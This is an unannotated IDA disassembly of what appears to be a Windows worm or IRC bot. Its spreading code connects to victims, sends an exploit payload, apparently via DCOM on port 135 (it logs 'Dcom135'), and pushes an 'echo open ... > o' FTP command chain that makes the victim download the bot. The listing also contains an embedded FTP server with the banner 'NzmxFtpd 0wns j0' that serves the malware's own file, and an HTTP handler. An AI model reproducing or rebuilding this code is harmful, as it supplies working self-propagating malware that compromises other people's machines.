cmp esi, 0FFFFFFFFh
jz short loc_4050FA
lea eax, [ebp-10h]
push 10h
push eax
push esi
call ds:dword_42421C ;; connect
cmp eax, 0FFFFFFFFh
jnz short loc_4050DB
push esi
jmp short loc_4050F4
; ---------------------------------------------------------------------------
loc_4050DB: ; CODE XREF: _0:004050D6�j
push 0
push 1213h
push offset dword_428C60
push esi
call ds:dword_424208 ;; send
cmp eax, 0FFFFFFFFh
push esi
jnz short loc_4050FE
loc_4050F4: ; CODE XREF: _0:004050D9�j
call ds:dword_424220 ;; closesocket
loc_4050FA: ; CODE XREF: _0:004050C4�j
xor eax, eax
jmp short loc_405140
; ---------------------------------------------------------------------------
loc_4050FE: ; CODE XREF: _0:004050F2�j
call ds:dword_424220 ;; closesocket
push 216Bh
lea esi, [ebp+8]
sub esp, 0BCh
push 2Fh
pop ecx
mov edi, esp
rep movsd
call sub_404F9A
add esp, 0C0h
test eax, eax
jz short loc_40513D
mov eax, [ebp+0B0h]
imul eax, 3Ch
inc ds:dword_42ACB8[eax]
lea eax, dword_42ACB8[eax]
loc_40513D: ; CODE XREF: _0:00405126�j
push 1
pop eax
loc_405140: ; CODE XREF: _0:004050FC�j
pop edi
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405144 proc near ; CODE XREF: _0:00405340�p
var_5A0 = byte ptr -5A0h
var_1A0 = byte ptr -1A0h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
sub esp, 5A0h
push ebx
push esi
push edi
xor edi, edi
push 10h
lea eax, [ebp+var_10]
push edi
push eax
call sub_417330
add esp, 0Ch
lea eax, [ebp+arg_4]
mov [ebp+var_10], 2
push eax
call ds:dword_43ADD8 ;; inet_addr
mov [ebp+var_C], eax
mov ax, ds:word_42A040
push eax
call ds:dword_43AD98 ;; htons
push edi
push 1
push 2
mov [ebp+var_E], ax
call ds:dword_43AE18 ;; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
jz loc_40525B
lea eax, [ebp+var_10]
push 10h
push eax
push esi
call ds:dword_43AD40 ;; connect
cmp eax, 0FFFFFFFFh
jz loc_40525B
mov ebx, 400h
push edi
lea eax, [ebp+var_5A0]
push ebx
push eax
push esi
call ds:dword_43ADB0 ;; recv
push ds:dword_436F0C
push [ebp+arg_0]
call sub_40AEE0
pop ecx
mov edi, 190h
push eax
push offset aEchoOpenSDOE_0 ; "echo open %s %d > o&echo user 1 1 >> o "...
lea eax, [ebp+var_1A0]
push edi
push eax
call sub_41782A
add esp, 14h
lea eax, [ebp+var_1A0]
push 0
push eax
call sub_417AB0
pop ecx
push eax
lea eax, [ebp+var_1A0]
push eax
push esi
call ds:dword_43ADE8 ;; send
cmp eax, 0FFFFFFFFh
jz short loc_40525B
push 1F4h
call ds:dword_424064 ;; Sleep
push offset byte_42F674
push offset dword_428598
lea eax, [ebp+var_1A0]
push edi
push eax
call sub_41782A
add esp, 10h
lea eax, [ebp+var_1A0]
push 0
push eax
call sub_417AB0
pop ecx
push eax
lea eax, [ebp+var_1A0]
push eax
push esi
call ds:dword_43ADE8 ;; send
cmp eax, 0FFFFFFFFh
jnz short loc_40525F
loc_40525B: ; CODE XREF: sub_405144+51�j
; sub_405144+67�j ...
xor al, al
jmp short loc_405279
; ---------------------------------------------------------------------------
loc_40525F: ; CODE XREF: sub_405144+115�j
push 0
lea eax, [ebp+var_5A0]
push ebx
push eax
push esi
call ds:dword_43ADB0 ;; recv
push esi
call ds:dword_43AE30 ;; closesocket
mov al, 1
loc_405279: ; CODE XREF: sub_405144+119�j
pop edi
pop esi
pop ebx
leave
retn
sub_405144 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 210h
push ebx
push esi
lea eax, [ebp+0Ch]
push edi
push eax
call ds:dword_4241F8 ;; gethostbyname
mov esi, eax
test esi, esi
jnz short loc_4052A8
lea eax, [ebp+0Ch]
push eax
call ds:dword_4241FC ;; inet_addr
mov ebx, eax
jmp short loc_4052AE
; ---------------------------------------------------------------------------
loc_4052A8: ; CODE XREF: _0:00405298�j
mov ebx, [ebp+0C0h]
loc_4052AE: ; CODE XREF: _0:004052A6�j
push 11h
push 2
push 2
call ds:dword_424214 ;; socket
test esi, esi
mov edi, eax
jz short loc_4052D8
movsx eax, word ptr [esi+0Ah]
push eax
mov eax, [esi+0Ch]
push dword ptr [eax]
lea eax, [ebp-0Ch]
push eax
call sub_417390
add esp, 0Ch
jmp short loc_4052DB
; ---------------------------------------------------------------------------
loc_4052D8: ; CODE XREF: _0:004052BE�j
mov [ebp-0Ch], ebx
loc_4052DB: ; CODE XREF: _0:004052D6�j
test esi, esi
jz short loc_4052E9
mov ax, [esi+8]
mov [ebp-10h], ax
jmp short loc_4052EF
; ---------------------------------------------------------------------------
loc_4052E9: ; CODE XREF: _0:004052DD�j
mov word ptr [ebp-10h], 2
loc_4052EF: ; CODE XREF: _0:004052E7�j
push 599h
call ds:dword_424224 ;; htons
mov [ebp-0Eh], ax
lea eax, [ebp-10h]
push 10h
push eax
push edi
call ds:dword_42421C ;; connect
test eax, eax
jnz loc_4053BE
push eax
push 1C9h
push offset loc_429E74
push edi
call ds:dword_424208 ;; send
push 3E8h
call ds:dword_424064 ;; Sleep
sub esp, 0BCh
lea esi, [ebp+8]
push 2Fh
pop ecx
mov edi, esp
rep movsd
call sub_405144
add esp, 0BCh
test al, al
jz short loc_405354
push 1
pop eax
jmp short loc_4053D0
; ---------------------------------------------------------------------------
loc_405354: ; CODE XREF: _0:0040534D�j
lea eax, [ebp+0Ch]
push eax
mov eax, [ebp+0B0h]
imul eax, 3Ch
add eax, offset aDcom135 ; "Dcom135"
push eax
push offset unk_42A0B0
lea eax, [ebp-210h]
push 200h
push eax
call sub_41782A
push 0
lea eax, [ebp-210h]
push dword ptr [ebp+0B8h]
push eax
lea eax, [ebp+1Ch]
push eax
push dword ptr [ebp+8]
call sub_40D679
lea eax, [ebp-210h]
push eax
call sub_40BF6D
mov eax, [ebp+0B0h]
add esp, 2Ch
imul eax, 3Ch
inc ds:dword_42ACB8[eax]
lea eax, dword_42ACB8[eax]
jmp short loc_4053CE
; ---------------------------------------------------------------------------
loc_4053BE: ; CODE XREF: _0:0040530D�j
push 1
push edi
call ds:dword_4241F4 ;; shutdown
push edi
call ds:dword_424220 ;; closesocket
loc_4053CE: ; CODE XREF: _0:004053BC�j
xor eax, eax
loc_4053D0: ; CODE XREF: _0:00405352�j
pop edi
pop esi
pop ebx
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4053D5 proc near ; DATA XREF: sub_407252+226�o
var_A6C = byte ptr -0A6Ch
var_8DC = byte ptr -8DCh
var_6DC = dword ptr -6DCh
var_6D8 = byte ptr -6D8h
var_4C4 = byte ptr -4C4h
var_444 = dword ptr -444h
var_440 = dword ptr -440h
var_438 = dword ptr -438h
var_334 = byte ptr -334h
var_2D0 = byte ptr -2D0h
var_29C = byte ptr -29Ch
var_238 = byte ptr -238h
var_228 = dword ptr -228h
var_224 = dword ptr -224h
var_124 = byte ptr -124h
var_F8 = byte ptr -0F8h
var_C4 = byte ptr -0C4h
var_AC = byte ptr -0ACh
var_48 = byte ptr -48h
var_38 = word ptr -38h
var_36 = word ptr -36h
var_34 = dword ptr -34h
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = byte ptr -20h
var_1C = byte ptr -1Ch
var_18 = dword ptr -18h
var_14 = byte ptr -14h
var_10 = byte ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0A6Ch
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 1
mov ecx, 0A9h
mov esi, eax
lea edi, [ebp+var_6DC]
pop ebx
rep movsd
mov [eax+2A0h], ebx
lea eax, [ebp+var_A6C]
xor edi, edi
push eax
push 101h
mov [ebp+var_28], ebx
mov [ebp+var_18], ebx
mov [ebp+var_228], edi
mov [ebp+var_438], edi
call ds:dword_4241E0 ;; WSAStartup
push edi
call sub_4186B1
push eax
call sub_417302
push 0FEB0h
push 406h
call sub_415450
add esp, 10h
mov ds:dword_436F0C, eax
push edi
push ebx
push 2
call ds:dword_424214 ;; socket
mov esi, eax
lea eax, [ebp+var_28]
push 4
push eax
push 4
push 0FFFFh
push esi
mov [ebp+var_C], esi
call ds:dword_4241E4 ;; setsockopt
lea eax, [ebp+var_18]
push eax
push 8004667Eh
push esi
call ds:dword_424218 ;; ioctlsocket
mov ax, word ptr ds:dword_436F0C
mov [ebp+var_38], 2
push eax
mov [ebp+var_34], edi
call ds:dword_424224 ;; htons
mov [ebp+var_36], ax
lea eax, [ebp+var_38]
push 10h
push eax
push esi
call ds:dword_4241E8 ;; bind
test eax, eax
jge short loc_4054AA
mov eax, ebx
jmp loc_4059D4
; ---------------------------------------------------------------------------
loc_4054AA: ; CODE XREF: sub_4053D5+CC�j
push 0Ah
push esi
call ds:dword_4241EC ;; listen
mov [ebp+var_228], ebx
mov ebx, ds:dword_424208
mov [ebp+var_224], esi
mov [ebp+var_4], esi
loc_4054C8: ; CODE XREF: sub_4053D5+12C�j
; sub_4053D5+5F7�j
push 41h
lea esi, [ebp+var_228]
pop ecx
lea edi, [ebp+var_438]
rep movsd
xor esi, esi
lea eax, [ebp+var_438]
push esi
push esi
push esi
push eax
mov eax, [ebp+var_4]
inc eax
push eax
call ds:dword_42420C ;; select
cmp eax, 0FFFFFFFFh
jz loc_4059D1
xor edi, edi
cmp [ebp+var_4], esi
mov [ebp+arg_0], edi
jl short loc_4054C8
loc_405503: ; CODE XREF: sub_4053D5+5F1�j
xor esi, esi
push 64h
lea eax, [ebp+var_29C]
push esi
push eax
call sub_417330
push 64h
lea eax, [ebp+var_AC]
push esi
push eax
call sub_417330
add esp, 18h
lea eax, [ebp+var_438]
push eax
push edi
call sub_422A46 ; __WSAFDIsSet
test eax, eax
jz loc_4059BF
cmp edi, [ebp+var_C]
jnz short loc_4055BA
lea eax, [ebp+var_24]
mov [ebp+var_24], 10h
push eax
lea eax, [ebp+var_238]
push eax
push [ebp+var_C]
call ds:dword_4241F0 ;; accept
cmp eax, 0FFFFFFFFh
jz loc_4059BF
xor ecx, ecx
cmp [ebp+var_228], esi
jbe short loc_405584
lea edx, [ebp+var_224]
loc_405574: ; CODE XREF: sub_4053D5+1AD�j
cmp [edx], eax
jz short loc_405584
inc ecx
add edx, 4
cmp ecx, [ebp+var_228]
jb short loc_405574
loc_405584: ; CODE XREF: sub_4053D5+197�j
; sub_4053D5+1A1�j
cmp ecx, [ebp+var_228]
jnz short loc_4055A2
cmp [ebp+var_228], 40h
jnb short loc_4055A2
mov [ebp+ecx*4+var_224], eax
inc [ebp+var_228]
loc_4055A2: ; CODE XREF: sub_4053D5+1B5�j
; sub_4053D5+1BE�j
cmp eax, [ebp+var_4]
jle short loc_4055AA
mov [ebp+var_4], eax
loc_4055AA: ; CODE XREF: sub_4053D5+1D0�j
push esi
push 15h
push offset a220Nzmxftpd0wn ; "220 NzmxFtpd 0wns j0\n"
push eax
call ebx ; send
jmp loc_4059BF
; ---------------------------------------------------------------------------
loc_4055BA: ; CODE XREF: sub_4053D5+169�j
push esi
lea eax, [ebp+var_29C]
push 64h
push eax
push edi
call ds:dword_424204 ;; recv
test eax, eax
jg short loc_405621
mov edx, [ebp+var_228]
xor ecx, ecx
cmp edx, esi
jbe short loc_405615
lea eax, [ebp+var_224]
loc_4055E1: ; CODE XREF: sub_4053D5+216�j
cmp [eax], edi
jz short loc_4055EF
inc ecx
add eax, 4
cmp ecx, edx
jb short loc_4055E1
jmp short loc_405615
; ---------------------------------------------------------------------------
loc_4055EF: ; CODE XREF: sub_4053D5+20E�j
dec edx
cmp ecx, edx
jnb short loc_40560F
lea eax, [ebp+ecx*4+var_224]
loc_4055FB: ; CODE XREF: sub_4053D5+238�j
mov edx, [eax+4]
inc ecx
mov [eax], edx
mov edx, [ebp+var_228]
add eax, 4
dec edx
cmp ecx, edx
jb short loc_4055FB
loc_40560F: ; CODE XREF: sub_4053D5+21D�j
dec [ebp+var_228]
loc_405615: ; CODE XREF: sub_4053D5+204�j
; sub_4053D5+218�j
push edi
call ds:dword_424220 ;; closesocket
jmp loc_4059BF
; ---------------------------------------------------------------------------
loc_405621: ; CODE XREF: sub_4053D5+1F8�j
lea eax, [ebp+var_334]
push eax
lea eax, [ebp+var_AC]
push eax
lea eax, [ebp+var_29C]
push offset aSS ; "%s %s"
push eax
call sub_418A52
lea eax, [ebp+var_AC]
push offset aUser_0 ; "USER"
push eax
call sub_4176D0
add esp, 18h
test eax, eax
jnz short loc_405665
push esi
push 16h
push offset a331PasswordReq ; "331 Password required\n"
jmp loc_4059AA
; ---------------------------------------------------------------------------
loc_405665: ; CODE XREF: sub_4053D5+281�j
lea eax, [ebp+var_AC]
push offset aPass ; "PASS"
push eax
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz short loc_405689
push esi
push 14h
push offset a230UserLoggedI ; "230 User logged in.\n"
jmp loc_4059AA
; ---------------------------------------------------------------------------
loc_405689: ; CODE XREF: sub_4053D5+2A5�j
lea eax, [ebp+var_AC]
push offset aSyst ; "SYST"
push eax
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz short loc_4056AD
push esi
push 0Dh
push offset a215Nzmxftpd ; "215 NzmxFtpd\n"
jmp loc_4059AA
; ---------------------------------------------------------------------------
loc_4056AD: ; CODE XREF: sub_4053D5+2C9�j
lea eax, [ebp+var_AC]
push offset aRest ; "REST"
push eax
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz short loc_4056D1
push esi
push 10h
push offset a350Restarting_ ; "350 Restarting.\n"
jmp loc_4059AA
; ---------------------------------------------------------------------------
loc_4056D1: ; CODE XREF: sub_4053D5+2ED�j
lea eax, [ebp+var_AC]
push offset off_42A2D0
push eax
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz short loc_4056F5
push esi
push 1Eh
push offset a257IsCurrentDi ; "257 \"/\" is current directory.\n"
jmp loc_4059AA
; ---------------------------------------------------------------------------
loc_4056F5: ; CODE XREF: sub_4053D5+311�j
lea eax, [ebp+var_AC]
push offset aType ; "TYPE"
push eax
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz short loc_405730
lea eax, [ebp+var_334]
push offset aA ; "A"
push eax
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz short loc_405730
push esi
push 13h
push offset a200TypeSetToA_ ; "200 Type set to A.\n"
jmp loc_4059AA
; ---------------------------------------------------------------------------
loc_405730: ; CODE XREF: sub_4053D5+335�j
; sub_4053D5+34C�j
lea eax, [ebp+var_AC]
push offset aType ; "TYPE"
push eax
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz short loc_40576B
lea eax, [ebp+var_334]
push offset aI ; "I"
push eax
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz short loc_40576B
push esi
push 13h
push offset a200TypeSetToI_ ; "200 Type set to I.\n"
jmp loc_4059AA
; ---------------------------------------------------------------------------
loc_40576B: ; CODE XREF: sub_4053D5+370�j
; sub_4053D5+387�j
lea eax, [ebp+var_AC]
push offset aPasv ; "PASV"
push eax
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz short loc_4057B9
push 0Ah
mov esi, offset a425PassiveNotS ; "425 Passive not supported on this serve"...
pop ecx
lea edi, [ebp+var_124]
rep movsd
push eax
lea eax, [ebp+var_124]
push eax
movsw
call sub_417AB0
pop ecx
push eax
lea eax, [ebp+var_124]
loc_4057A9: ; CODE XREF: sub_4053D5+423�j
push eax
push [ebp+arg_0]
call ebx ; send
xor esi, esi
loc_4057B1: ; CODE XREF: sub_4053D5+4F6�j
mov edi, [ebp+arg_0]
jmp loc_4059AD
; ---------------------------------------------------------------------------
loc_4057B9: ; CODE XREF: sub_4053D5+3AB�j
lea eax, [ebp+var_AC]
push offset aList ; "LIST"
push eax
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz short loc_4057FA
push 5
mov esi, offset a226TransferCom ; "226 Transfer complete\n"
pop ecx
lea edi, [ebp+var_C4]
rep movsd
movsw
push eax
lea eax, [ebp+var_C4]
push eax
movsb
call sub_417AB0
pop ecx
push eax
lea eax, [ebp+var_C4]
jmp short loc_4057A9
; ---------------------------------------------------------------------------
loc_4057FA: ; CODE XREF: sub_4053D5+3F9�j
lea eax, [ebp+var_AC]
push offset aPort ; "PORT"
push eax
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz loc_4058D0
lea eax, [ebp+var_2D0]
push eax
lea eax, [ebp+var_F8]
push eax
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_29C]
push offset aS ; "%*s %[^,],%[^,],%[^,],%[^,],%[^,],%[^\n]"...
push eax
call sub_418A52
lea eax, [ebp+var_F8]
push eax
call sub_41781F
mov edi, eax
lea eax, [ebp+var_2D0]
push eax
call sub_41781F
mov [ebp+var_8], eax
push 32h
lea eax, [ebp+var_F8]
push esi
push eax
call sub_417330
add esp, 34h
lea eax, [ebp+var_F8]
push [ebp+var_8]
push edi
push offset aXX ; "%x%x\n"
push eax
call sub_4172B0
push 10h
lea eax, [ebp+var_F8]
push esi
push eax
call sub_418A3B
add esp, 1Ch
mov [ebp+var_8], eax
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_48]
push offset aS_S_S_S ; "%s.%s.%s.%s"
push eax
call sub_4172B0
add esp, 18h
push esi
push 1Dh
push offset a200PortCommand ; "200 PORT command successful.\n"
push [ebp+arg_0]
call ebx ; send
jmp loc_4057B1
; ---------------------------------------------------------------------------
loc_4058D0: ; CODE XREF: sub_4053D5+43A�j
lea eax, [ebp+var_AC]
push offset aRetr ; "RETR"
push eax
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz loc_40598B
push esi
push 28h
push offset a150OpeningBina ; "150 Opening BINARY mode data connection"...
push edi
call ebx ; send
push [ebp+var_8]
lea eax, [ebp+var_48]
push eax
call sub_4059DB
pop ecx
cmp eax, 1
pop ecx
jnz short loc_405981
call sub_405A58
cmp eax, 1
jnz loc_4059AD
push esi
push 17h
push offset a226TransferC_0 ; "226 Transfer complete.\n"
push edi
call ebx ; send
lea eax, [ebp+var_6D8]
push eax
lea eax, [ebp+var_48]
push ds:dword_436F0C
push eax
lea eax, [ebp+var_8DC]
push offset unk_42A128
push eax
call sub_4172B0
add esp, 14h
cmp [ebp+var_440], esi
jnz short loc_405972
push esi
lea eax, [ebp+var_8DC]
push [ebp+var_444]
push eax
lea eax, [ebp+var_4C4]
push eax
push [ebp+var_6DC]
call sub_40D679
add esp, 14h
loc_405972: ; CODE XREF: sub_4053D5+578�j
lea eax, [ebp+var_8DC]
push eax
call sub_40BF6D
pop ecx
jmp short loc_4059AD
; ---------------------------------------------------------------------------
loc_405981: ; CODE XREF: sub_4053D5+532�j
push esi
push 20h
push offset a425CanTOpenDat ; "425 Can't open data connection.\n"
jmp short loc_4059AA
; ---------------------------------------------------------------------------
loc_40598B: ; CODE XREF: sub_4053D5+510�j
lea eax, [ebp+var_AC]
push offset aQuit ; "QUIT"
push eax
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz short loc_4059AD
push esi
push 1Bh
push offset a221GoodbyeHapp ; "221 Goodbye happy r00ting.\n"
loc_4059AA: ; CODE XREF: sub_4053D5+28B�j
; sub_4053D5+2AF�j ...
push edi
call ebx ; send
loc_4059AD: ; CODE XREF: sub_4053D5+3DF�j
; sub_4053D5+53C�j ...
push 64h
lea eax, [ebp+var_29C]
push esi
push eax
call sub_417330
add esp, 0Ch
loc_4059BF: ; CODE XREF: sub_4053D5+160�j
; sub_4053D5+189�j ...
inc edi
cmp edi, [ebp+var_4]
mov [ebp+arg_0], edi
jle loc_405503
jmp loc_4054C8
; ---------------------------------------------------------------------------
loc_4059D1: ; CODE XREF: sub_4053D5+11E�j
push 1
pop eax
loc_4059D4: ; CODE XREF: sub_4053D5+D0�j
pop edi
pop esi
pop ebx
leave
retn 4
sub_4053D5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4059DB proc near ; CODE XREF: sub_4053D5+528�p
var_1A0 = byte ptr -1A0h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 1A0h
lea eax, [ebp+var_1A0]
push eax
push 101h
call ds:dword_4241E0 ;; WSAStartup
push 0
push 1
push 2
call ds:dword_424214 ;; socket
push [ebp+arg_0]
mov ds:dword_436F08, eax
mov [ebp+var_10], 2
call ds:dword_4241FC ;; inet_addr
push [ebp+arg_4]
mov [ebp+var_C], eax
call ds:dword_424224 ;; htons
mov [ebp+var_E], ax
lea eax, [ebp+var_10]
push 10h
push eax
push ds:dword_436F08
call ds:dword_42421C ;; connect
cmp eax, 0FFFFFFFFh
jnz short loc_405A53
push ds:dword_436F08
call ds:dword_424220 ;; closesocket
call ds:dword_424200 ;; WSACleanup
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_405A53: ; CODE XREF: sub_4059DB+60�j
push 1
pop eax
leave
retn
sub_4059DB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405A58 proc near ; CODE XREF: sub_4053D5+534�p
var_504 = byte ptr -504h
var_104 = byte ptr -104h
push ebp
mov ebp, esp
sub esp, 504h
push esi
lea eax, [ebp+var_104]
push 104h
push eax
push 0
call ds:off_424094
lea eax, [ebp+var_104]
push offset aRb ; "rb"
push eax
call sub_4179A8
mov esi, eax
pop ecx
test esi, esi
pop ecx
jz short loc_405AEF
test byte ptr [esi+0Ch], 10h
jnz short loc_405AD3
push edi
mov edi, 400h
loc_405A9B: ; CODE XREF: sub_405A58+78�j
push esi
push 1
lea eax, [ebp+var_504]
push edi
push eax
call sub_418A86
add esp, 10h
lea eax, [ebp+var_504]
push 0
push edi
push eax
push ds:dword_436F08
call ds:dword_424208 ;; send
push 1
call ds:dword_424064 ;; Sleep
test byte ptr [esi+0Ch], 10h
jz short loc_405A9B
pop edi
loc_405AD3: ; CODE XREF: sub_405A58+3B�j
push esi
call sub_417900
pop ecx
push ds:dword_436F08
call ds:dword_424220 ;; closesocket
call ds:dword_424200 ;; WSACleanup
push 1
pop eax
loc_405AEF: ; CODE XREF: sub_405A58+35�j
pop esi
leave
retn
sub_405A58 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405AF2 proc near ; DATA XREF: sub_407252+333�o
; sub_40EE72+54E8�o
var_28F0 = byte ptr -28F0h
var_18F0 = byte ptr -18F0h
var_8F0 = byte ptr -8F0h
var_6F0 = byte ptr -6F0h
var_5EC = dword ptr -5ECh
var_5E8 = byte ptr -5E8h
var_360 = byte ptr -360h
var_25C = dword ptr -25Ch
var_254 = dword ptr -254h
var_250 = dword ptr -250h
var_24C = dword ptr -24Ch
var_248 = dword ptr -248h
var_23C = byte ptr -23Ch
var_138 = dword ptr -138h
var_134 = dword ptr -134h
var_34 = byte ptr -34h
var_24 = word ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 28F0h
call sub_417B30
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
mov ecx, 0ECh
mov esi, eax
lea edi, [ebp+var_5EC]
push 1
rep movsd
pop esi
xor ebx, ebx
mov [eax+3ACh], esi
push 10h
lea eax, [ebp+var_24]
push ebx
push eax
mov [ebp+var_14], esi
call sub_417330
add esp, 0Ch
mov [ebp+var_24], 2
push [ebp+var_25C]
call ds:dword_43AD98 ;; htons
push ebx
push esi
push 2
mov [ebp+var_22], ax
mov [ebp+var_20], ebx
call ds:dword_43AE18 ;; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
mov [ebp+var_C], edi
jz loc_405EDD
mov eax, [ebp+var_254]
push 10h
imul eax, 234h
mov ds:dword_4407FC[eax], edi
lea eax, [ebp+var_24]
push eax
push edi
call ds:dword_43ADC4 ;; bind
cmp eax, 0FFFFFFFFh
jz loc_405EDD
push 7FFFFFFFh
push edi
call ds:dword_43ADC0 ;; listen
cmp eax, 0FFFFFFFFh
jz loc_405EDD
lea eax, [ebp+var_14]
push eax
push 8004667Eh
push edi
call ds:dword_43AE34 ;; ioctlsocket
cmp eax, 0FFFFFFFFh
jz loc_405EDD
mov ebx, esi
mov [ebp+var_134], edi
mov [ebp+var_138], ebx
mov [ebp+var_8], edi
loc_405BC9: ; CODE XREF: sub_405AF2+3E1�j
push 41h
xor eax, eax
pop ecx
lea esi, [ebp+var_138]
push eax
push eax
push eax
lea eax, [ebp+var_6F0]
push eax
mov eax, [ebp+var_8]
lea edi, [ebp+var_6F0]
inc eax
rep movsd
push eax
call ds:dword_43AD80 ;; select
cmp eax, 0FFFFFFFFh
jz loc_405ED8
xor esi, esi
mov [ebp+var_4], esi
loc_405BFF: ; CODE XREF: sub_405AF2+3DB�j
lea eax, [ebp+var_6F0]
push eax
push esi
call ds:dword_43AC90 ;; __WSAFDIsSet
test eax, eax
jz loc_405EC3
cmp esi, [ebp+var_C]
jnz short loc_405C81
lea eax, [ebp+var_10]
mov [ebp+var_10], 10h
push eax
lea eax, [ebp+var_34]
push eax
push [ebp+var_C]
call ds:dword_43AE2C ;; accept
cmp eax, 0FFFFFFFFh
jz loc_405EC3
xor ecx, ecx
test ebx, ebx
jbe short loc_405C53
lea edx, [ebp+var_134]
loc_405C47: ; CODE XREF: sub_405AF2+15F�j
cmp [edx], eax
jz short loc_405C53
inc ecx
add edx, 4
cmp ecx, ebx
jb short loc_405C47
loc_405C53: ; CODE XREF: sub_405AF2+14D�j
; sub_405AF2+157�j
cmp ecx, ebx
jnz short loc_405C70
cmp ebx, 40h
jnb short loc_405C70
mov [ebp+ecx*4+var_134], eax
mov ebx, [ebp+var_138]
inc ebx
mov [ebp+var_138], ebx
loc_405C70: ; CODE XREF: sub_405AF2+163�j
; sub_405AF2+168�j
cmp eax, [ebp+var_8]
jbe loc_405EC3
mov [ebp+var_8], eax
jmp loc_405EC3
; ---------------------------------------------------------------------------
loc_405C81: ; CODE XREF: sub_405AF2+126�j
mov edi, 1000h
lea eax, [ebp+var_28F0]
push edi
push 0
push eax
call sub_417330
push edi
lea eax, [ebp+var_18F0]
push 0
push eax
call sub_417330
add esp, 18h
lea eax, [ebp+var_28F0]
push 0
push edi
push eax
push esi
call ds:dword_43ADB0 ;; recv
test eax, eax
jg short loc_405D14
push esi
call ds:dword_43AE30 ;; closesocket
xor ecx, ecx
test ebx, ebx
jbe loc_405EC3
lea eax, [ebp+var_134]
loc_405CD3: ; CODE XREF: sub_405AF2+1EB�j
cmp [eax], esi
jz short loc_405CE4
inc ecx
add eax, 4
cmp ecx, ebx
jb short loc_405CD3
jmp loc_405EC3
; ---------------------------------------------------------------------------
loc_405CE4: ; CODE XREF: sub_405AF2+1E3�j
lea eax, [ebx-1]
cmp ecx, eax
jnb short loc_405D08
lea eax, [ebp+ecx*4+var_134]
loc_405CF2: ; CODE XREF: sub_405AF2+214�j
mov edx, [eax+4]
inc ecx
mov [eax], edx
mov ebx, [ebp+var_138]
add eax, 4
lea edx, [ebx-1]
cmp ecx, edx
jb short loc_405CF2
loc_405D08: ; CODE XREF: sub_405AF2+1F7�j
dec ebx
mov [ebp+var_138], ebx
jmp loc_405EC3
; ---------------------------------------------------------------------------
loc_405D14: ; CODE XREF: sub_405AF2+1C8�j
xor esi, esi
push 104h
lea eax, [ebp+var_23C]
push esi
push eax
call sub_417330
lea eax, [ebp+var_28F0]
mov [ebp+arg_0], esi
push eax
call sub_417AB0
add esp, 10h
test eax, eax
jbe loc_405EC3
loc_405D42: ; CODE XREF: sub_405AF2+309�j
mov eax, [ebp+arg_0]
mov al, [ebp+eax+var_28F0]
cmp al, 0Ah
mov [ebp+esi+var_18F0], al
jnz loc_405DE7
mov esi, offset aGet ; "GET "
lea eax, [ebp+var_18F0]
push esi
push eax
call sub_417880
pop ecx
test eax, eax
pop ecx
jz short loc_405DBB
lea eax, [ebp+var_18F0]
push eax
call sub_417AB0
cmp eax, 5
pop ecx
jbe short loc_405DBB
mov eax, offset asc_42A3B4 ; " "
push eax
push eax
lea eax, [ebp+var_18F0]
push esi
push eax
call sub_417880
pop ecx
pop ecx
push eax
call sub_417880
pop ecx
pop ecx
push eax
call sub_418B6E
push eax
lea eax, [ebp+var_23C]
push eax
call sub_4179C0
add esp, 10h
jmp short loc_405DD2
; ---------------------------------------------------------------------------
loc_405DBB: ; CODE XREF: sub_405AF2+27F�j
; sub_405AF2+291�j
lea eax, [ebp+var_18F0]
push offset asc_42A3B0 ; "\r\n"
push eax
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz short loc_405E06
loc_405DD2: ; CODE XREF: sub_405AF2+2C7�j
push edi
lea eax, [ebp+var_18F0]
push 0
push eax
call sub_417330
add esp, 0Ch
or esi, 0FFFFFFFFh
loc_405DE7: ; CODE XREF: sub_405AF2+263�j
inc [ebp+arg_0]
lea eax, [ebp+var_28F0]
push eax
inc esi
call sub_417AB0
cmp [ebp+arg_0], eax
pop ecx
jb loc_405D42
jmp loc_405EC3
; ---------------------------------------------------------------------------
